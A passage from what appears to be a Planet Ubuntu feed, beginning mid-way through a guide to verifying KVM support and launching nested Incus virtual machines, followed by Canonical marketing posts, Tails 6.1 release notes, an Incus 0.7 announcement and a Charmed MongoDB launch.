<p>You would need to enter into the BIOS/UEFI settings and enable the option for <strong>VT-x</strong> (for Intel CPUs) or <strong>AMD-V</strong> (for AMD CPUs) virtualization. If you are unsure, you can just follow the instructions in the next step which will complain if you have not enabled the appropriate BIOS/UEFI settings.</p>
<p>As a sidenote there is another setting, Intel VT-d (for Intel CPUs) or AMD-Vi (for AMD CPUs) that allow to move a supported hardware device (like a GPU, if you have more than one) into the VM. Not essential for what we are testing, but keep that in mind if you get too deep into virtualization.</p>
<p>There are also some additional options that are optional, AMD Nested Page tables (NPT) (for AMD) and Rapid Virtualization Indexing (RVI)/Intel Extended Page Tables (EPT) for Intel. These help for performance. </p>
<h2 class="wp-block-heading" id="testing-your-host-for-virtualization">Testing your host for virtualization</h2>
<p>The Linux kernel that is available in most Linux distributions supports <a href="https://en.wikipedia.org/wiki/Kernel-based_Virtual_Machine">the KVM hypervisor</a> for virtualization.</p>
<p>Applications use <a href="https://libvirt.org/">the <code>libvirt</code>toolkit</a> to access the virtualization features. </p>
<p>In order to test if our host supports virtualization, we install <code>cpu-checker</code> and the <code>libvirt-clients</code> packages on the host and then run <code>kvm-ok</code> and <code>virt-host-validate</code> respectively to verify our system. Compared between the two utilities, the latter is better. However, I am including <code>cpu-checker</code>as it is covered in lots of documentation.</p>
<pre class="wp-block-code"><code>$ <kbd>sudo apt install -y cpu-checker libvirt-clients</kbd>
...
$ <kbd>kvm-ok</kbd>
INFO: /dev/kvm exists
KVM acceleration can be used
$ <kbd>sudo virt-host-validate</kbd>
QEMU: Checking for hardware virtualization : PASS
QEMU: Checking if device /dev/kvm exists : PASS
QEMU: Checking if device /dev/kvm is accessible : PASS
QEMU: Checking if device /dev/vhost-net exists : PASS
QEMU: Checking if device /dev/net/tun exists : PASS
QEMU: Checking for cgroup 'cpu' controller support : PASS
QEMU: Checking for cgroup 'cpuacct' controller support : PASS
QEMU: Checking for cgroup 'cpuset' controller support : PASS
QEMU: Checking for cgroup 'memory' controller support : PASS
QEMU: Checking for cgroup 'devices' controller support : PASS
QEMU: Checking for cgroup 'blkio' controller support : PASS
QEMU: Checking for device assignment IOMMU support : PASS
QEMU: Checking if IOMMU is enabled by kernel : PASS
QEMU: Checking for secure guest support : WARN (Unknown if this platform has Secure Guest support)
LXC: Checking for Linux >= 2.6.26 : PASS
LXC: Checking for namespace ipc : PASS
LXC: Checking for namespace mnt : PASS
LXC: Checking for namespace pid : PASS
LXC: Checking for namespace uts : PASS
LXC: Checking for namespace net : PASS
LXC: Checking for namespace user : PASS
LXC: Checking for cgroup 'cpu' controller support : PASS
LXC: Checking for cgroup 'cpuacct' controller support : PASS
LXC: Checking for cgroup 'cpuset' controller support : PASS
LXC: Checking for cgroup 'memory' controller support : PASS
LXC: Checking for cgroup 'devices' controller support : PASS
LXC: Checking for cgroup 'freezer' controller support : FAIL (Enable 'freezer' in kernel Kconfig file or mount/enable cgroup controller in your system)
LXC: Checking for cgroup 'blkio' controller support : PASS
LXC: Checking if device /sys/fs/fuse/connections exists : PASS
$ </code></pre>
<p>If you get a failure, try to identify whether the issue is with your computer’s firmware or with the Linux kernel of your host. If in doubt, post below the output.</p>
<p>Why does the output mention both <strong>QEMU</strong> and <strong>LXC</strong>? By default, the command shows all <code>libvirt</code> virtualization support, unless you specify something specific. If you wanted only the QEMU output, you would run <code>sudo virt-host-validate qemu</code>. Note that the LXC here is not <a href="https://linuxcontainers.org/lxc/introduction/">the Linux Containers LXC</a>. The LXC above is <a href="https://libvirt.org/drvlxc.html">the Libvirt LXC</a>.</p>
<h2 class="wp-block-heading" id="testing-your-host-for-nested-virtualization">Testing your host for nested virtualization</h2>
<p>I have not noticed any mention for <em>nested virtualization</em> in the output of <code>virt-host-validate</code>. If you know a tool that shows that information, write it in the comments. In the absence of such a tool, let’s check manually.</p>
<p>If you have an AMD CPU, run the following. If you get <code>1</code>, then nested virtualization through KVM works.</p>
<pre class="wp-block-code"><code>$ <kbd>cat /sys/module/kvm_amd/parameters/nested </kbd>
1
$ </code></pre>
<p>If instead you have an Intel CPU, run the following. If you get <code>Y</code>(instead of <strong><em>1</em></strong>), then nested virtualization through KVM works.</p>
<pre class="wp-block-code"><code>$ <kbd>cat /sys/module/kvm_intel/parameters/nested</kbd>
Y
$ </code></pre>
<p>If instead you get an error (such as the following), then something is wrong. Report back your CPU model and motherboard, along with the Linux kernel version and Linux distribution.</p>
<pre class="wp-block-code"><code>cat: /sys/module/kvm_intel/parameters/nested: No such file or directory</code></pre>
<h2 class="wp-block-heading" id="launching-the-outer-incus-vm">Launching the outer Incus VM</h2>
<p>We launch the outer VM. Get a shell into the outer VM, install Incus and those utilities that show whether KVM virtualization works. Then, we launch an Alpine VM in the outer VM. We get an error regarding Secure Boot (the Alpine Linux kernel is not signed), remove the stuck VM and launch again with Secure Boot disabled. Finally, we get a shell into the inner VM.</p>
<pre class="wp-block-code"><code>$ <kbd>incus launch images:debian/12 outervm --vm</kbd>
Launching outervm
$ <kbd>incus shell outervm</kbd>
root@outervm:~#
# Install Incus according to the documentation.
root@outervm:~# <kbd>sudo apt install -y cpu-checker libvirt-clients</kbd>
...
root@outervm:~# <kbd>virt-host-validate </kbd>
QEMU: Checking for hardware virtualization : PASS
QEMU: Checking if device /dev/kvm exists : PASS
QEMU: Checking if device /dev/kvm is accessible : PASS
QEMU: Checking if device /dev/vhost-net exists : PASS
QEMU: Checking if device /dev/net/tun exists : PASS
...
root@outervm:~# <kbd>incus launch images:alpine/edge innervm --vm</kbd>
Launching innervm
Error: Failed instance creation: The image used by this instance is incompatible with secureboot. Please set security.secureboot=false on the instance
root@outervm:~# <kbd>incus delete innervm</kbd>
root@outervm:~# <kbd>incus launch images:alpine/edge innervm --vm --config security.secureboot=false</kbd>
Launching innervm
root@outervm:~# <kbd>incus list -c ns4t</kbd>
+---------+---------+-----------------------+-----------------+
| NAME | STATE | IPV4 | TYPE |
+---------+---------+-----------------------+-----------------+
| innervm | RUNNING | 10.227.169.165 (eth0) | VIRTUAL-MACHINE |
+---------+---------+-----------------------+-----------------+
root@outervm:~# <kbd>uname -a</kbd>
Linux outervm 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
root@outervm:~# incus shell innervm
innervm:~# <kbd>uname -a</kbd>
Linux innervm 6.6.22-1-virt #2-Alpine SMP PREEMPT_DYNAMIC Thu, 14 Mar 2024 02:12:52 +0000 x86_64 Linux
innervm:~# </code></pre>
<figure class="wp-block-image size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-from-2024-03-27-15-39-25.png?ssl=1"><img alt="" class="wp-image-46740" height="449" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-from-2024-03-27-15-39-25.png?resize=750%2C449&ssl=1" width="750" /></a></figure>
<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>
<p>We saw how to verify whether our host is able to work with hardware virtualization. This involves checking both the computer firmware settings (BIOS/UEFI) and the host Linux kernel.</p>
<p>Then, we created an outer VM with Incus, got a shell into there, installed Incus, and launched an inner (<strong><em>nested</em></strong>) VM. </p>
<p>I wonder whether we can go further and create a VM inside the inner VM. If you go through these and try to create an inner inner VM, post the error message. It does not feel like it should be possible.</p>
<div class="saboxplugin-wrap"><div class="saboxplugin-tab"><div class="saboxplugin-gravatar"><img alt="Simos Xenitellis" class="avatar avatar-100 photo" height="100" src="https://secure.gravatar.com/avatar/5c04c6b5f513d926ea9d77782a3843a1?s=100&d=wavatar&r=g" width="100" /></div><div class="saboxplugin-authorname"><a class="vcard author" href="https://blog.simos.info/author/simos/" rel="author"><span class="fn">Simos Xenitellis</span></a></div><div class="saboxplugin-desc"><div></div></div><div class="saboxplugin-web "><a href="https://blog.simos.info/" target="_self">blog.simos.info/</a></div><div class="clearfix"></div></div></div>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Canonical at Google Next – What you need to knowhttps://ubuntu.com//blog/canonical-at-google-next-what-you-need-to-know2024-03-27T11:00:00+00:00<p>Google Next is making its way to Las Vegas, and Ubuntu is joining the journey. As a proud sponsor, Canonical, the publisher of Ubuntu , invites you to join us at the event and visit booth #252 in the Mandalay Bay Expo Hall. As one of the most popular Linux operating systems, Canonical is dedicated to providing commercial support and driving open source innovation across a diverse range of industries and applications. Stop by and learn more about how Canonical and GCP are collaborating to empower businesses with secure and scalable solutions for their cloud computing needs. </p>
<h2 class="wp-block-heading">Ubuntu ‘Show you’re a Pro’ Challenge: Find and patch the vulnerabilities and earn awesome swag!</h2>
<p>Are you an Ubuntu Pro? Test your skills at our booth! Sit down at our workstation and discover any unpatched vulnerabilities on the machine. Showcase your expertise by securing the system completely, and receive exclusive swag as a token of our gratitude.</p>
<h2 class="wp-block-heading">Security maintenance for your full software stack</h2>
<p>At Canonical, security is paramount. Ubuntu Pro offers a solution to offload security and compliance concerns for your open source stack, allowing you to concentrate on building and managing your business. Serving as an additional layer of services atop every Ubuntu LTS release, Ubuntu Pro ensures robust protection for your entire software stack, encompassing over 30,000 open source packages. Say farewell to fragmented security measures; Canonical provides a holistic approach, delivering security and support through a unified vendor. Additionally, relish the assurance of vendor-backed SLA support for open source software, providing peace of mind for your operations.</p>
<h2 class="wp-block-heading">Confidential computing across clouds</h2>
<p>Confidential computing is a revolutionary technology that disrupts the conventional threat model of public clouds. In the past, vulnerabilities within the extensive codebase of the cloud’s privileged system software, including the operating system and hypervisor, posed a constant risk to the confidentiality and integrity of code and data in operation. Likewise, unauthorized access by a cloud administrator could compromise the security of your virtual machine (VM). </p>
<p>Ubuntu Confidential VMs (CVMs) on Google Cloud offer enhanced security for your workloads by utilizing hardware-protected Trusted Execution Environments (TEEs). With the broadest range of CVMs available, Ubuntu enables users on Google Cloud to benefit from the cutting-edge security features of AMD 4th Gen EPYC processors with SEV-SNP and Intel Trust Domain Extensions (Intel TDX).</p>
<h2 class="wp-block-heading">Scale your AI projects with open source tooling</h2>
<p>Empower your organization with Canonical’s AI solutions. We specialize in the automation of machine learning workloads on any environment, whether private or public cloud, or hybrid or multi cloud. We provide an end-to-end MLOps solution to develop and deploy models in a secure, reproducible, and portable manner that seamlessly integrates with your existing technology stack. Let us help you unlock the full potential of AI.</p>
<h2 class="wp-block-heading">Join Us at Google Next 2024</h2>
<p>Mark your calendars and make plans to visit Canonical at Google Cloud Next 2024. Whether you’re seeking cutting-edge solutions for cloud computing, robust security measures for your software stack, or innovative AI tools to propel your organization forward, our team will be on hand to offer insights, demonstrations, and personalized consultations to help you harness the power of open source technology for your business. Join us at booth #252 to discover how Canonical and Ubuntu can elevate your digital journey. See you there!</p>
<p>Prompts:</p>
<p>Canonical at Google Next – What you need to know!</p>
<p>Canonical is excited to sponsor Google Cloud Next in Las Vegas, NV April 9-11, 2024. </p>
<p>visit to the Canonical-Ubuntu booth #252 in the Mandalay Bay Expo Hall. </p>
<p>Our team will be available to discuss the following:</p>
<ul>
<li>Protect your full software tech stack with Ubuntu Pro providing security coverage for 30,000+ software packages.</li>
<li>Single vendor for security requirements – delivery, security, support; Vendor-backed SLA support for open source </li>
<li>Confidential computing – OS support across all clouds (multi-cloud/hybrid cloud)</li>
<li>AI
<ul>
<li>Canonical provides tailored solutions to enable your organisation to efficiently run machine learning workloads. Canonical offers an end-to-end MLOps solution that can be used across all layers of the technology stack.</li>
</ul>
</li>
</ul>
<p>While at our booth, earn some awesome swag by showing that you’re an Ubuntu Pro. Take a seat at our workstation to find the unpatched vulnerabilities on the machine! Upgrade the machine to be fully secure to earn awesome swag! </p>
<p>See you at the event</p>Ubuntu developershttp://planet.ubuntu.com/Tails 6.1https://tails.net/news/version_6.1/index.en.html2024-03-27T10:42:03+00:00<h1 id="changes">Changes and updates</h1>
<ul>
<li><p>Update <em>Tor Browser</em> to <a href="https://blog.torproject.org/new-release-tor-browser-13013/">13.0.13</a>.
This includes the changes brought by <a href="https://blog.torproject.org/new-release-tor-browser-13012/">13.0.12</a>.</p></li>
<li><p>Update <em>Thunderbird</em> to <a href="https://www.thunderbird.net/en-US/thunderbird/115.9.0/releasenotes/">115.9.0</a>.</p></li>
</ul>
<h1 id="fixes">Fixed problems</h1>
<ul>
<li><p>Fix Onion Circuits. <a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20233">#20233</a></p></li>
<li><p>Fix Welcome Screen frequently showing a <strong>"Welcome to Tails!" is not responding</strong> error.
<a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20236">#20236</a></p></li>
<li><p>Fix <em>Videos</em> showing an error message during playback. <a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20243">#20243</a></p></li>
<li><p>Fix problems with changing the passphrase of the Persistent Storage.
<a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20217">#20217</a></p></li>
<li><p><em>Tails Cloner</em> can now install and upgrade to devices with multiple mounted partitions.
<a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20149">#20149</a></p></li>
<li><p>The Persistent Storage settings now display
all enabled custom Persistent Storage features. <a href="https://gitlab.tails.boum.org/tails/tails/-/issues/19267">#19267</a></p></li>
<li><p>Mitigate the RFDS Intel CPU vulnerabilities. <a href="https://gitlab.tails.boum.org/tails/tails/-/issues/20274">#20274</a></p></li>
</ul>
<p>For more details, read our <a href="https://gitlab.tails.boum.org/tails/tails/-/blob/master/debian/changelog">changelog</a>.</p>
<h1 id="get">Get Tails 6.1</h1>
<h2>To upgrade your Tails USB stick and keep your Persistent Storage</h2>
<ul>
<li><p>Automatic upgrades are available from Tails 6.0 to 6.1.</p>
<p>You can <a href="https://tails.net/doc/upgrade/index.en.html#reduce">reduce the size of the download</a> of future
automatic upgrades by doing a manual upgrade to the latest version.</p></li>
<li><p>If you cannot do an automatic upgrade or if Tails fails to start after an
automatic upgrade, please try to do a <a href="https://tails.net/doc/upgrade/index.en.html#manual">manual upgrade</a>.</p></li>
</ul>
<h2>To install Tails 6.1 on a new USB stick</h2>
<p>Follow our installation instructions:</p>
<ul>
<li><p><a href="https://tails.net/install/windows/index.en.html">Install from Windows</a></p></li>
<li><p><a href="https://tails.net/install/mac/index.en.html">Install from macOS</a></p></li>
<li><p><a href="https://tails.net/install/linux/index.en.html">Install from Linux</a></p></li>
<li><p><a href="https://tails.net/install/expert/index.en.html">Install from Debian or Ubuntu using the command line and GnuPG</a></p></li>
</ul>
<div class="caution"><p>The Persistent Storage on the USB stick will be lost if
you install instead of upgrading.</p></div>
<h2>To download only</h2>
<p>If you don't need installation or upgrade instructions, you can download
Tails 6.1 directly:</p>
<ul>
<li><p><a href="https://tails.net/install/download/index.en.html">For USB sticks (USB image)</a></p></li>
<li><p><a href="https://tails.net/install/download-iso/index.en.html">For DVDs and virtual machines (ISO image)</a></p></li>
</ul>Tailshttps://tails.net/news/index.en.htmlUbuntu Blog: What is a telco cloud?https://ubuntu.com//blog/what-is-a-telco-cloud2024-03-27T08:00:00+00:00<p>Telecommunications companies (telcos) are well on their way to transforming their infrastructure from the legacy, unadaptable, complex network of dedicated hardware from yesteryears to agile, modular and scalable software-defined systems running on common off-the-shelf (COTS) servers.</p>
<p>Within this space, the current trend, driven by 5G deployments, is to complement tried and tested network function virtualisation (NFV) infrastructure with cloud-native network functions (CNFs). This refers to the cloud-native approach of building, deploying and managing telco functions and applications as a mesh of micro services packaged as containers.</p>
<p>A telco cloud is a highly robust and dynamic infrastructure built using cloud-native technologies designed specifically for communication services providers (CSPs) to deliver agile, flexible and efficient telecom services. It combines various components like software-defined networking (SDN), orchestration tools and other cloud computing technologies to enable the creation, customisation, and management of network services in a more cost-effective, scalable, and automated manner compared to traditional telecom architectures. It empowers telcos to reduce their innovations’ time to market, to react more quickly to shifts in network requirements and to improve their operational efficiency. A telco cloud provides the foundation for next-generation communication services, including 5G stand-alone (5G SA) networks and various Internet of Things (IoT) applications.</p>
<h2 class="wp-block-heading">How does a telco cloud address telco challenges?</h2>
<p>In order to stay innovative and competitive, telcos need ever more agility. They need to respond quickly to shifting market dynamics, evolving customer demands and emerging technologies. They require flexibility, modularity and freedom to customise solutions to keep up with the evolution of the industry. These are all areas in which a telco cloud can help.</p>
<h3 class="wp-block-heading">Innovate and customise</h3>
<p>With cloud-native application development techniques, telcos can leverage a telco cloud to bring new 5G revenue streams, internally developed or externally acquired from new tech and start-ups with a higher risk appetite than service providers.</p>
<p>They can reduce the time to develop, build and deploy new services and features to specific customer segments. This enables bringing solutions targeting new markets, such as industry monitoring, smart cities, smart homes, connected cars and fleet management.</p>
<p>These solutions can be tailored to specific customers quickly and economically thanks to the agility, modularity and flexibility of cloud-native software development.</p>
<p>Similarly, these technologies allow telcos to build platforms which can ignite collaboration and provide support to innovative third party developers. This can enable the creation of value in the telco’s core competencies, including connectivity and operational excellence, while reducing risks associated with the process of experimentation.</p>
<h3 class="wp-block-heading">Increase power efficiency</h3>
<p>Energy expenses currently comprise <a href="https://www.gsmaintelligence.com/product-news/going-green-energy-efficiency-in-telecoms/">between 15% and 40% of telcos’ operating costs</a>. They are all actively looking for ways to reduce their energy consumption through energy-efficient technology, renewable energy sources, and improved operational efficiency.</p>
<p>By virtualizing network functions and consolidating multiple workloads on a shared infrastructure, a telco cloud reduces the overall number of physical servers and corresponding power requirements. With intelligent load-balancing techniques, a telco cloud ensures optimal resource utilisation across the network, minimising idle resources and reducing the need for excess capacity, which in turn decreases power consumption. </p>
<p>The use of specific analytics coupled with automation can be beneficial to optimise the power consumption of telco workloads. Underutilised wasteful infrastructure can be identified and massive power savings can be achieved with the right optimisation approach while maintaining network performance and service levels. A telco cloud offers the flexibility to scale resources up or down according to demand, ensuring that only the necessary compute, storage and network capacity is being used. The high availability and fault tolerance features of a telco cloud ensure minimal downtime and prevent overloading of resources, thereby optimising energy consumption by reducing the need for redundant equipment or backup systems.</p>
<h3 class="wp-block-heading">Improve customer loyalty</h3>
<p>Telcos are facing heightened competition and shifting consumer behaviours, necessitating creative approaches to increase revenue and maintain customer expansion. One way is to bundle and aggregate popular streaming services by partnering with content platforms.</p>
<p>A telco cloud enables the integration – from delivery to billing – of various digital services, such as over-the-top (OTT) media content distribution, to significantly enhance the telco customer experience. </p>
<p>Using AI-powered tools, telcos are also able to grow their revenues by predicting and preventing subscriber churn. A telco cloud delivers more agile cloud-centric monetisation platforms providing more insights to power the new generation of services.</p>
<h3 class="wp-block-heading">Reduce costs</h3>
<p>A telco cloud, when run at scale, reduces the capital expenditure required to support network infrastructure by enabling companies to utilise COTS hardware and pay only for the capacity they need, adjusting with usage changes, while leveraging the hybrid cloud.</p>
<p>This shift to operational expenditure is covered by the accompanying process automation enabled by Telco Cloud best practices and cloud-native application development methodologies, such as DevSecOps and CI/CD.</p>
<p>The highly resilient and automated architecture of the Telco Cloud also improves service availability and reduces the time to respond to faults and demand fluctuations.</p>
<div>
<a href="https://ubuntu.com/engage/telco-dilemma-reduce-5g-infra-cost">
<p class="p-button--positive">Read more about reducing 5G infrastructure costs with open source</p>
</a>
</div>
<h2 class="wp-block-heading">What are the technical requirements for a telco cloud?</h2>
<p>There are significant differences between your general purpose cloud environment and that of a telco cloud. With the exception of mission-critical applications, enterprise cloud deployments can tolerate less tight availability and performance requirements than those of telco network functions.</p>
<p>Some functions, such as the 5G Radio Access Network (RAN), need to perform in real-time at the edge of the network, as close to the user equipment as possible, with the best throughput and latency. The five nines availability goal, a downtime of no more than 5.26 minutes per year, is also a given.</p>
<p>A telco cloud encompasses not only the telco central offices and edge locations, but also data centres spread across the network reach. It delivers its network functions and other workloads wherever they can be run in order to optimise efficiency and quality of experience.</p>
<p>Carrier-grade network requirements initially prevented moving network functions to the public cloud. With the improvement of multi cloud and hybrid cloud connectivity, more and more telcos are leveraging public cloud infrastructure for some of their telco cloud network functions. One significant advantage of the container technology used in cloud-native architecture is its portability. The microservices realising a network function and its dependencies are encapsulated in a single, self-contained unit that can run on any system that supports the container format.</p>
<p>One of the key conditions in achieving a successful implementation of a telco cloud is the need for business continuity and coexistence of cloud-native with existing legacy infrastructure. During a telco cloud deployment, companies need to be able to seamlessly migrate existing network services and applications in a coordinated manner. A good way to approach this challenge is to consider not only the infrastructure and product portfolio but also the organisation and its processes.</p>
<p>As with any project, there are several factors to evaluate when deploying a telco cloud:</p>
<ul>
<li>Whether to buy a complete solution or to do everything or part of it internally, with or without external support from a systems integrator.</li>
<li>What amount should be invested upfront?</li>
<li>How much risk is acceptable?</li>
<li>What is the target time-to-market?</li>
<li>How will success be defined and measured?</li>
</ul>
<p>Some of the key decisions that telcos need to make include:</p>
<ul>
<li>Identifying the telco cloud services that need to redeveloped as microservices instead of migrated virtual machines (VMs).</li>
<li>Selecting the right management and orchestration tools to support the efficient and effective automation of a telco cloud.</li>
<li>Defining the rules that drive the hybrid cloud approach, depending on the economics, operational expertise and time-to-market requirements.</li>
<li>Partnering and collaborating with technology companies, startups, and other organisations. This can help to access new technologies, markets, and expertise, and accelerate time-to-market</li>
</ul>
<p>The path to a successful telco cloud deployment can be long and difficult but it is one of the key milestones for a telco to achieve its transition into a “techco” (technology-driven company) equipped to face competition from tech giants, media conglomerates and startups.</p>
<h2 class="wp-block-heading">How can Canonical help you deploy a telco cloud?</h2>
<p>In order to deploy a telco cloud effectively, companies need the tools that can support all their critical workloads wherever they run them, and enable them to incorporate innovators into the CSP network.</p>
<p>Canonical brings the power of open source cloud-native technologies to the telco industry. A member of key telecommunications initiatives (such as the <a href="https://canonical.com/blog/canonical-joins-open-networking-foundation">Open Networking Foundation</a>, where we contribute to the <a href="https://opennetworking.org/aether/">Aether</a> project, the <a href="https://canonical.com/blog/canonical-joins-the-openairinterfacesoftware-alliance">OpenAirInterface Software Alliance</a>, the <a href="https://canonical.com/blog/canonical-joins-the-sylva-project">Sylva</a> project, and <a href="https://www.etsi.org/">ETSI</a>), Canonical provides cloud platforms that support the deployment and operation of certified virtual and container network functions both for the 5G Core and RAN. We are a proven, trusted technology partner in the ecosystem, with years of experience in telco operations across the globe.</p>
<p>Canonical maintains a strong security posture by ensuring all published open source software is hardened, audited and certified to adhere to industry standards. This commitment extends to reducing the footprint of the OS and containers to minimise the attack surface.</p>
<p>This specific innovation also translates into efficiency gains that are significant in large-scale RAN deployments involving tens or even hundreds of thousands of nodes.</p>
<p>Furthermore, Canonical’s robust <a href="https://ubuntu.com/blog/bringing-automation-to-telco-edge-clouds-at-scale">automation tooling</a> and 12 years long term support (LTS) not only streamline day 2 operations but also contribute to a competitive TCO making canonical the most economical vendor in the market.</p>
<p>Global top-tier operators endorse Canonical solutions for telcos. Our solutions encompass core, RAN and edge use cases and provide essential Enhanced Platform Awareness capabilities such as affinity and anti-affinity rules, CPU pinning, DPDK, Huge Pages, SR-IOV and secondary vNIC access, among others.</p>
<p>Groundwork starts with our tight partnerships with<a href="https://canonical.com/partners/silicon"> silicon vendors and independent hardware vendors</a> that ensure Canonical provides the best silicon enablement and support for innovative technologies and acceleration capabilities.</p>
<p>Lastly, Canonical’s simple and unique <a href="https://ubuntu.com/pro">Ubuntu Pro</a> subscription offers the most comprehensive long term support, security and compliance for all your open source software. Using Canonical solutions, companies can operate carrier-grade cloud-native Telco Clouds at scale.</p>
<h3 class="wp-block-heading">Learn more about Canonical solutions for telcos</h3>
<p><a href="https://ubuntu.com/telco">Carrier-grade open source for telecommunications</a></p>
<p><a href="https://canonical.com/solutions/telco">Transform your infrastructure with secure and cloud-native telecom solutions</a></p>
<h3 class="wp-block-heading">Further reading</h3>
<p><a href="https://ubuntu.com/engage/telco-dilemma-reduce-5g-infra-cost">Reduce 5G infrastructure costs with open source</a></p>
<p><a href="https://ubuntu.com/blog/how-telcos-are-building-carrier-grade-infrastructure-using-open-source">How telcos are building carrier-grade infrastructure using open source</a></p>
<p><a href="https://ubuntu.com/blog/how-a-real-time-kernel-reduces-latency-in-telco-edge-clouds">How a real-time kernel reduces latency in telco edge clouds</a></p>Ubuntu developershttp://planet.ubuntu.com/Stéphane Graber: Announcing Incus 0.7https://stgraber.org/?p=15612024-03-26T22:42:33+00:00<p>The last Incus release before we go LTS has now been released!</p>
<p>This is quite the feature packed release as this is meant to include just about every features we want in Incus 6.0 LTS except for a few last minute minor additions.</p>
<p>You’ll find new features for just about everyone, from multi-cluster networking with the new network integrations, to enhanced performance on multi-socket servers with the improved NUMA support, to easier authentication with JSON Web Token support, to I/O limits for virtual machines and more USB passthrough options.</p>
<figure class="wp-block-image size-large"><a href="https://linuxcontainers.org/incus/try-it/" rel="noreferrer noopener" target="_blank"><img alt="" class="wp-image-1562" height="600" src="https://stgraber.org/wp-content/uploads/2024/03/image-1024x600.png" width="1024" /></a></figure>
<p>The full announcement and changelog can be <a href="https://discuss.linuxcontainers.org/t/incus-0-7-has-been-released/19485" rel="noreferrer noopener" target="_blank">found here</a>.<br />And for those who prefer videos, here’s the release overview video:</p>
<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
</div></figure>
<p>You can take the latest release of Incus up for a spin through our online demo service at: <a href="https://linuxcontainers.org/incus/try-it/" rel="noreferrer noopener" target="_blank">https://linuxcontainers.org/incus/try-it/</a></p>
<p>And as always, my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship. You’ll find all details of that here: <a href="https://zabbly.com/incus">https://zabbly.com/incus</a></p>
<p>Donations towards my work on this and other open source projects is also always appreciated, you can find me on <a href="https://github.com/sponsors/stgraber">Github Sponsors</a>, <a href="https://patreon.com/stgraber">Patreon</a> and <a href="https://ko-fi.com/stgraber">Ko-fi</a>.</p>
<p>Enjoy!</p>Ubuntu developershttp://planet.ubuntu.com/How to Install the Rootfs into the Btrfs subvolume & Set a Restore envhttps://www.deepin.org/?p=334062024-03-26T02:14:55+00:00Author: ziggy [Btrfs Now] Installing the rootfs into the btrfs subvols for deepin & Set the restore env Pre-preparation Installation Preparation Prepare a installation image and flash it with a mobile storage device, a kernel with version 5.10+ is recommend, which has a better support for btrfs. Set 2 partitations in advance. A btrfs partitation as the main rootfs. A live system with full functions. An independent partition to install the initial system. It could be installed into an extranal hard disk instead. When the hard disk where btrfs located is broken, it can be restored as a rootb backup. ...<a href="https://www.deepin.org/en/install-the-rootfs-into-the-btrfs-subvolume/">Read more</a>aidahttps://www.deepin.org/enUbuntu Blog: Charmed MongoDB enters general availabilityhttps://ubuntu.com//blog/charmed-mongodb-enters-general-availability2024-03-26T01:00:00+00:00<p><strong>March 26, 2024:</strong> Today, Canonical announced the release of Charmed MongoDB, an enterprise solution for MongoDB® that comes with advanced automation features, multi-cloud capabilities and comprehensive support. </p>
<p></p>
<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
</div></figure>
<p></p>
<p><a href="https://ubuntu.com/blog/what-is-mongodb">MongoDB</a>® is one of the most widely used databases worldwide. It provides powerful capabilities for scaling, consistency and fault tolerance , making it a popular choice for organisations of all sizes and in various industries. Charmed MongoDB is an enterprise drop-in replacement for the MongoDB® Community version with the advanced features organisations need in their production environment.</p>
<p><em>“As part of our open source data solution portfolio, Charmed MongoDB is designed to meet the demands of modern deployments”</em>, said Cedric Gegout, VP of Product at Canonical. <em>“Organisations can deploy Charmed MongoDB with confidence, knowing they are backed by Canonical’s commitment to performance in any cloud environment, alongside 10 years of support and security maintenance.”</em></p>
<h3 class="wp-block-heading">Hyper-automated MongoDB<strong><sup>®</sup></strong>, available on any cloud</h3>
<p>The Charmed MongoDB operator deploys and runs MongoDB® on physical, virtual machines (VM) and other cloud and cloud-like environments, including AWS, Azure, OpenStack and VMWare.<br /><br />The solution comes with automation features that simplify the deployment, scaling, design, and management of MongoDB®, ensuring reliability. In addition to these capabilities, Charmed MongoDB offers enterprise-level features such as high availability, sharding, audit logging, backup and restore, user management, and Transport Layer Security (TLS). </p>
<h3 class="wp-block-heading">Secured and supported for 10 years</h3>
<p>For organisations looking for fast security patching against Common Vulnerabilities and Exposures (CVEs), Charmed MongoDB offers comprehensive security maintenance. Canonical’s Charmed MongoDB offers a cost-effective, subscription model that includes 10 years of security maintenance and 24/7 support, providing the stability and peace of mind necessary for organisations to run MongoDB® in production. </p>
<h3 class="wp-block-heading">Simple pricing per node</h3>
<p>Charmed MongoDB is part of Canonical’s <a href="https://canonical.com/data">data solutions portfolio</a>. Customers purchase 24/7 or weekday enterprise support on a per-node basis through the Ubuntu Pro + Support plan, which covers all applications within the portfolio, including <a href="https://canonical.com/data/kafka">Charmed Kafka</a> and <a href="https://canonical.com/data/spark">Charmed Spark</a> as well as solutions for AI offered by Canonical such as <a href="https://ubuntu.com/ai/what-is-kubeflow">Charmed Kubeflow</a> and<a href="https://ubuntu.com/ai/mlflow"> Charmed MLFlow</a>.</p>
<p>This convenient subscription per node and lack of software licence fees makes Canonical’s offering compelling for organisations looking to run database solutions like MongoDB® with more control over their TCO. Budgeting and financial planning are straightforward and predictable.</p>
<h3 class="wp-block-heading">Get started with Charmed MongoDB</h3>
<p>To get started with Charmed MongoDB, users can refer to the documentation available at <a href="https://charmhub.io/mongodb">Charmhub</a>. For more information about Charmed MongoDB, visit <a href="http://canonical.com/data/mongodb">canonical.com/data/mongodb</a>.</p>
<p>Canonical is also delighted to offer <a href="https://assets.ubuntu.com/v1/cfecb9cd-Charmed%20MongoDB%20Training_Public%20Module-4.pdf">Charmed MongoDB training</a> in collaboration with <a href="https://cloudbase.it/">Cloudbase Solutions</a>. This program is designed to help individuals get started with Charmed MongoDB through in-person or virtual training.</p>
<h3 class="wp-block-heading">Additional resources</h3>
